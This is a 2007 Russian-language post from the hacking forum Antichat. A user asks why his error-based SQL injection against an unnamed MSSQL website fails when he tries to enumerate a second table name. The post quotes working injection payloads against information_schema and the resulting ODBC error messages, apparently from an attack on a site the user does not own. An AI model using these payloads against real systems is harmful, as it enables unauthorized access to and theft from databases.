ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу [Microsoft][ODBC SQL Server Driver]
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

[Microsoft][ODBC SQL Server Driver]
  #1  
Старый 14.01.2007, 20:34
Аватар для sh-smoker
sh-smoker
Познающий
Регистрация: 13.01.2007
Сообщений: 35
Провел на форуме:
115804

Репутация: -12
По умолчанию [Microsoft][ODBC SQL Server Driver]
Хай.
Короче есть проблема которую нужно решить
Существует сайт.
На сайте инъекция (MSSQL)
При запросе такого вида:
===============================
-1+select+top+1+table_name+from+information_schema. tables
===============================

В ошибке выводится имя таблицы:
===============================
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Products' to a column of data type int
===============================

Одна таблица есть, пробую вытащить имя второй таблицы таким запросом:
===============================
select+top+1+table_name+from+information_schema.ta bles+where+table_name+not+in('Products')
===============================

На что сервак мне отвечает:
===============================
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 6: Incorrect syntax near 'Products'
===============================

На многих серваках этот приём срабатывал.....
Ошибка синтаксиса, хмм..
В чем же она заключается???
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection для чайников, взлом ASP+MSSQL k00p3r Чужие Статьи 0 12.06.2005 12:42
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ